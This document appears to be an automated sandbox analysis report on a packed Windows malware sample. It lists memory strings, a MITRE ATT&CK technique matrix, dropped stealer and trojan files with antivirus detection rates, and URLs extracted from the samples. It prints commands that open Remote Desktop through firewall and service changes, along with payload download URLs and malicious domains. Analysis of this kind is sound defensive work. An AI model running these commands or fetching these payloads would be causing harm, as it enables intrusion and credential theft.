GJaY4YLha2gZw1UT0ZGgt8gIlb0BdTgNhFTYphbRl3zPi2fHpd37=SEysZCRo3u89gLQ=KgpuOL==KgpvMb==KgpuNb==KgpvNL==O0KvchRz3uMSfLtbVx==Mgd3akKrZBtxBpLl4MdcJZhdGkGecXpw0MAjNr5dxwZm1KuiGfpjJdx50M4cgSRRxxudyaSg1HYwEu==HfNdRSdu3sL=GfpjJdxDOM78GzNjIv==SDY0ZSFE0wYjgr1c4AK=JTK1ZRJ63womgcxm1Abg4Kvy1X4z AMp9T3rZRMlAK2ggvQ8xa==Gd==aZ7YdBNA3S78QMI8ARGdBs==a0F6cr==ajurZB5yQZK2Yh5m2cT8YvBW1XLXMxvy1XAzUQH=KAptMyw5BJn=KAptMyw5B L=KAptMyw5B P=KAptMyw5BS1=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: dc753b12e1.exe, 00000020.00000002.3515627796.0000000002511000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: dc753b12e1.exe, 00000020.00000002.3515627796.0000000002511000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set9808a67f01d2f0720518035acbde7521c1ec479e5342a25940592acf24703eb27c43933a6df6cc301ccfdb96c295ca9e1379cdKQ6YLeECCI7oRIIlBdu0JXCschRUJvTmfL1bOR7r2ybwLPTtMr==SvPibCQyHPQpdL==JPKpdL==XgagNuVoBJ1TRp==WZYvZSx5AcYV4F==SXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0C QYRD2cYliuVc2hDm1UZcWoYyPWW XN==SXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0C QYRD2cYliuVc2hDm1UZcTYkA8A0oXUy VSJq29EKfvRj1wrD1Urk1YMDS0GeciN62q==SjKqWZQhIx5IxvMEWthJxwZwAVygSXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0C QYRD2cYliuVc2hDm1UZcWoYyakKrZBtxBpL8SEysZYFm1NP=SXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0C QYRD2cYliuVc2hDm1UZcTYkA8A0oXUy UXdq1wz8Wb5jOALv2o==HSKQRQFVJabxXJtwyK==VButcv==SBYQVv==PXKR9TF3bkB3aZF3 0B3Wj 3WUx3aDB3bTT3XDP3WUN3 EN3 Z23agP=W0yiZx1p1wAZ3Rtg2wVh1yr8W0yiZx1p1wz=WZmmcx1p1wz=XAt=XQt=XQx=XQB=RTumbb==9EGXcykAAm==9EGXcCIaAoa=XU7iXDmpWZQhaEBu UCmcjatJ0uYaRR5NDB+NDF+JYqpdR u1dPmIvhoGt==dx==HkKraSMdNN==aZ7ibBsEB98bgvs=9ZKvbhRxBpLl4vtjPZKXThB50N2cZShq3ALqHOZmdx==SEysZYFm1KU9ivB4OSOyUWMlJSbdiw 92gK=OUOmchA=QZuwcBRD2SwWNtt9Na==PSCCVv==SDurZBAlJSYaiMFg3Ba=PDYgdB5Dxvgc36==OSOEKwNtVB55NMAK4LJS2gbX4I==OjaXZBRrOM8b4ME=RjYvdB5zSZYtaB5EOZYqbXNATZarRBRrOM8b4ME=KAtvMuM6C fVTF==ajx=bZx=OZYrdBRz3s4LjMxcDcrq3Or0cYEl9hHlXjYvbNXpNNU9Tnx 1XLrOyzygU3xHMRjJPPqLNWyBNeAbX15OM8RQJNg2Xrs2Uf0cXbyKcsc 0yqLRNm3wHYNv191QK6xeLhfHHmKssc9TmibhByOJ3 GdPHQX5z3wYlirXL4RriDavheIEw7QE8bDasbd5ANTUcirXq3BziNOUNEh3OBNdqLNWyAI3=JPPKCb==N0CgceWCJjetZr==OZYrdBRz3s4LjMxcDcre2zvscXQl Acl fY1LS 83o4dgSFkARLv1yPu03boVQH=SYaQVzRSMuQShcFc1hHA1UZ0enbwQWMQVBCsbiND1SA4VR5k2BLXOPDO0X4pTyEl UqYdBRDIcIk4F==OZYqcCR5ONMF3LXcWTygZBRrOSkgfbpj1QVs2zzye4U5 h5UcUdtMOEECtXTSocWAPY=JUKraRJAOwXkSYaQVzRSMuQShcFc1hHA1UZ0enbwQWMQVBCsbiND1SA40L1g3ALhKefk1XbgMU0ETCyMTAt1HKUwYQs=SYaQVzRSMuQmgcNp1WnQOPKwOEIgQWMobjagZSJhFcIqfLJv0RDt1yz5ZG2tVAMlTjahZR5OGq==VAptMyw=PDKjYSRx3vQciwNg1g4wAdbS1YQz8BMQ9TYrPDKjYSRx3vQciwNg1g4wAdfS1YQz8BMQ9TYrSXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0BdTgNhFTYphbRl3zPi2fHpd37=SEysZCRo3u89gLQ=KgpuOL==KgpvMb==KgpuNb==KgpvNL==O0KvchRz3uMSfLtbVx==Mgd3akKrZBtxBpLl4MdcJZhdGkGecXpw0MAjNr5dxwZm1KuiGfpjJdx50M4cgSRRxxudyaSg1HYwEu==HfNdRSdu3sL=GfpjJdxDOM78GzNjIv==SDY0ZSFE0wYjgr1c4AK=JTK1ZRJ63womgcxm1Abg4Kvy1X4z AMp9T3rZRMlAK2ggvQ8xa==Gd==aZ7YdBNA3S78QMI8ARGdBs==a0F6cr==ajurZB5yQZK2Yh5m2cT8YvBW1XLXMxvy1XAzUQH=KAptMyw5BJn=KAptMyw5B L=KAptMyw5B P=KAptMyw5BS1=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: RegAsm.exe, 00000024.00000002.4790928166.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: RegAsm.exe, 00000024.00000002.4790928166.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set9808a67f01d2f0720518035acbde7521c1ec479e5342a25940592acf24703eb27c43933a6df6cc301ccfdb96c295ca9e1379cdKQ6YLeECCI7oRIIlBdu0JXCschRUJvTmfL1bOR7r2ybwLPTtMr==SvPibCQyHPQpdL==JPKpdL==XgagNuVoBJ1TRp==WZYvZSx5AcYV4F==SXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0C QYRD2cYliuVc2hDm1UZcWoYyPWW XN==SXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0C QYRD2cYliuVc2hDm1UZcTYkA8A0oXUy VSJq29EKfvRj1wrD1Urk1YMDS0GeciN62q==SjKqWZQhIx5IxvMEWthJxwZwAVygSXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0C QYRD2cYliuVc2hDm1UZcWoYyakKrZBtxBpL8SEysZYFm1NP=SXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0C QYRD2cYliuVc2hDm1UZcTYkA8A0oXUy UXdq1wz8Wb5jOALv2o==HSKQRQFVJabxXJtwyK==VButcv==SBYQVv==PXKR9TF3bkB3aZF3 0B3Wj 3WUx3aDB3bTT3XDP3WUN3 EN3 Z23agP=W0yiZx1p1wAZ3Rtg2wVh1yr8W0yiZx1p1wz=WZmmcx1p1wz=XAt=XQt=XQx=XQB=RTumbb==9EGXcykAAm==9EGXcCIaAoa=XU7iXDmpWZQhaEBu UCmcjatJ0uYaRR5NDB+NDF+JYqpdR u1dPmIvhoGt==dx==HkKraSMdNN==aZ7ibBsEB98bgvs=9ZKvbhRxBpLl4vtjPZKXThB50N2cZShq3ALqHOZmdx==SEysZYFm1KU9ivB4OSOyUWMlJSbdiw 92gK=OUOmchA=QZuwcBRD2SwWNtt9Na==PSCCVv==SDurZBAlJSYaiMFg3Ba=PDYgdB5Dxvgc36==OSOEKwNtVB55NMAK4LJS2gbX4I==OjaXZBRrOM8b4ME=RjYvdB5zSZYtaB5EOZYqbXNATZarRBRrOM8b4ME=KAtvMuM6C fVTF==ajx=bZx=OZYrdBRz3s4LjMxcDcrq3Or0cYEl9hHlXjYvbNXpNNU9Tnx 1XLrOyzygU3xHMRjJPPqLNWyBNeAbX15OM8RQJNg2Xrs2Uf0cXbyKcsc 0yqLRNm3wHYNv191QK6xeLhfHHmKssc9TmibhByOJ3 GdPHQX5z3wYlirXL4RriDavheIEw7QE8bDasbd5ANTUcirXq3BziNOUNEh3OBNdqLNWyAI3=JPPKCb==N0CgceWCJjetZr==OZYrdBRz3s4LjMxcDcre2zvscXQl Acl fY1LS 83o4dgSFkARLv1yPu03boVQH=SYaQVzRSMuQShcFc1hHA1UZ0enbwQWMQVBCsbiND1SA4VR5k2BLXOPDO0X4pTyEl UqYdBRDIcIk4F==OZYqcCR5ONMF3LXcWTygZBRrOSkgfbpj1QVs2zzye4U5 h5UcUdtMOEECtXTSocWAPY=JUKraRJAOwXkSYaQVzRSMuQShcFc1hHA1UZ0enbwQWMQVBCsbiND1SA40L1g3ALhKefk1XbgMU0ETCyMTAt1HKUwYQs=SYaQVzRSMuQmgcNp1WnQOPKwOEIgQWMobjagZSJhFcIqfLJv0RDt1yz5ZG2tVAMlTjahZR5OGq==VAptMyw=PDKjYSRx3vQciwNg1g4wAdbS1YQz8BMQ9TYrPDKjYSRx3vQciwNg1g4wAdfS1YQz8BMQ9TYrSXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0BdTgNhFTYphbRl3zPi2fHpd37=SEysZCRo3u89gLQ=KgpuOL==KgpvMb==KgpuNb==KgpvNL==O0KvchRz3uMSfLtbVx==Mgd3akKrZBtxBpLl4MdcJZhdGkGecXpw0MAjNr5dxwZm1KuiGfpjJdx50M4cgSRRxxudyaSg1HYwEu==HfNdRSdu3sL=GfpjJdxDOM78GzNjIv==SDY0ZSFE0wYjgr1c4AK=JTK1ZRJ63womgcxm1Abg4Kvy1X4z AMp9T3rZRMlAK2ggvQ8xa==Gd==aZ7YdBNA3S78QMI8ARGdBs==a0F6cr==ajurZB5yQZK2Yh5m2cT8YvBW1XLXMxvy1XAzUQH=KAptMyw5BJn=KAptMyw5B L=KAptMyw5B P=KAptMyw5BS1=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C2B0C40 sqlite3_bind_zeroblob,	7_2_6C2B0C40
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C2B0D60 sqlite3_bind_parameter_name,	7_2_6C2B0D60
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C1D8EA0 sqlite3_clear_bindings,	7_2_6C1D8EA0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C2B0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	7_2_6C2B0B40
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C1D6410 bind,WSAGetLastError,	7_2_6C1D6410

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	Valid Accounts	21 Windows Management Instrumentation	111 Scripting	1 DLL Side-Loading	411 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	1 Remote Desktop Protocol	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 DLL Side-Loading	2 Bypass User Account Control	11 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	41 Data from Local System	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	12 Command and Scripting Interpreter	1 Windows Service	1 Windows Service	3 Obfuscated Files or Information	Security Account Manager	13 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	11 Scheduled Task/Job	11 Scheduled Task/Job	412 Process Injection	33 Software Packing	NTDS	468 System Information Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 PowerShell	121 Registry Run Keys / Startup Folder	11 Scheduled Task/Job	1 Timestomp	LSA Secrets	991 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	121 Registry Run Keys / Startup Folder	1 DLL Side-Loading	Cached Domain Credentials	471 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Bypass User Account Control	DCSync	14 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	111 Masquerading	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	471 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	3 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	412 Process Injection	Network Sniffing	1 Remote System Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	47%	ReversingLabs	Win32.Packed.Themida
file.exe	44%	Virustotal		Browse
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\ProgramData\LgAmARwZ\Application.exe	100%	Joe Sandbox ML
C:\ProgramData\DZ Blu-ray player 11.1.45\DZ Blu-ray player 11.1.45.exe	46%	ReversingLabs	Win32.Trojan.Generic
C:\ProgramData\LgAmARwZ\Application.exe	61%	ReversingLabs	Win32.Trojan.Leonem
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\blurayplayer32.exe	46%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-1FNCS.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-2MA22.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-71E5U.tmp	4%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-7L9K5.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-A2FGH.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-AD0KH.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-ADJOR.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-C986N.tmp	2%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-EOQJN.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-EQ0NL.tmp	2%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-EV6NO.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-F3PSE.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-IKC0D.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-IRAOB.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-JIOLC.tmp	2%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-K2BT4.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-KC0R0.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-LD4GG.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-LIOS8.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-M38NA.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-N39PE.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-NT9JC.tmp	2%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-OJPOO.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-RUKE1.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-S71CN.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-T38SK.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-TQ33C.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\libgcc_s_dw2-1.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\libgdk-win32-2.0-0.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\libgdk_pixbuf-2.0-0.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\libgdkmm-2.4-1.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\libglibmm-2.4-1.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\libgmodule-2.0-0.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\libgobject-2.0-0.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\libgomp-1.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\libgraphite2.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\libharfbuzz-0.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\libintl-8.dll (copy)	2%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\libjpeg-8.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\liblcms2-2.dll (copy)	2%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\liblzma-5.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\libpango-1.0-0.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\libpangocairo-1.0-0.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\libpangoft2-1.0-0.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\libpangomm-1.4-1.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\libpangowin32-1.0-0.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\libpcre-1.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\libpixman-1-0.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\libpng16-16.dll (copy)	2%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\librsvg-2-2.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\libsigc-2.0-0.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\libtiff-5.dll (copy)	2%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\libwinpthread-1.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\BluRay Player 1.2.16\unins000.exe (copy)	4%	ReversingLabs
C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	5%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe	42%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\splwow64[1].exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\stail[1].exe	37%	ReversingLabs	Win32.Trojan.Sockssystemz
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\GOLD1234[1].exe	88%	ReversingLabs	Win32.Ransomware.RedLine
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Offnewhere[1].exe	42%	ReversingLabs	Win32.Downloader.Doina
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\JavUmar[1].exe	32%	ReversingLabs	Win32.Trojan.CryptBot
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\RDX123456[1].exe	74%	ReversingLabs	Win32.Trojan.MintZard
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\new_v8[1].exe	79%	ReversingLabs	Win32.Trojan.Generic

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	0%	URL Reputation	safe
https://www.gstatic.cn/recaptcha/	0%	URL Reputation	safe
http://www.valvesoftware.com/legal.htm	0%	URL Reputation	safe
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	0%	URL Reputation	safe
http://www.innosetup.com/	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://lv.queniujq.cn	0%	URL Reputation	safe
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	0%	URL Reputation	safe
https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	0%	URL Reputation	safe
https://checkout.steampowered.com/	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	0%	URL Reputation	safe
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	0%	URL Reputation	safe
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png	0%	URL Reputation	safe

Name	Malicious	Reputation
0/80/sevjoi17vt.top	true	unknown
seallysl.site	true	unknown
computeryrati.site	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	stealc_default2.exe, 00000007.00000003.2833417786.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3009118498.0000000003C4C000.00000004.00000800.00020000.00000000.sdmp, JavUmar.exe, 0000001F.00000003.3650241712.0000000003665000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3414104883.00000000054FC000.00000004.00000800.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3435080893.00000000054F9000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 0000002C.00000003.3525441016.0000000003BCC000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://185.215.113.16/inc/RDX123456.exe	axplong.exe, 00000006.00000002.4838480992.0000000001305000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://packagednyb.cyou/;	new_v8.exe, 0000001E.00000003.3060297039.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3091069312.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3060630671.0000000000CC4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3097027296.0000000000CC4000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/ac/?q=	stealc_default2.exe, 00000007.00000003.2833417786.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3009118498.0000000003C4C000.00000004.00000800.00020000.00000000.sdmp, JavUmar.exe, 0000001F.00000003.3650241712.0000000003665000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3414104883.00000000054FC000.00000004.00000800.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3435080893.00000000054F9000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 0000002C.00000003.3525441016.0000000003BCC000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.217/CoreOPT/index.php?scr=1#	RegAsm.exe, 00000024.00000002.4811775554.0000000001649000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://packagednyb.cyou/5	new_v8.exe, 0000001E.00000003.3044486078.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3045770050.0000000000CC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3030309875.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3045435699.0000000000CBD000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://packagednyb.cyou/3	new_v8.exe, 0000001E.00000003.3097750570.0000000000CC4000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV	new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
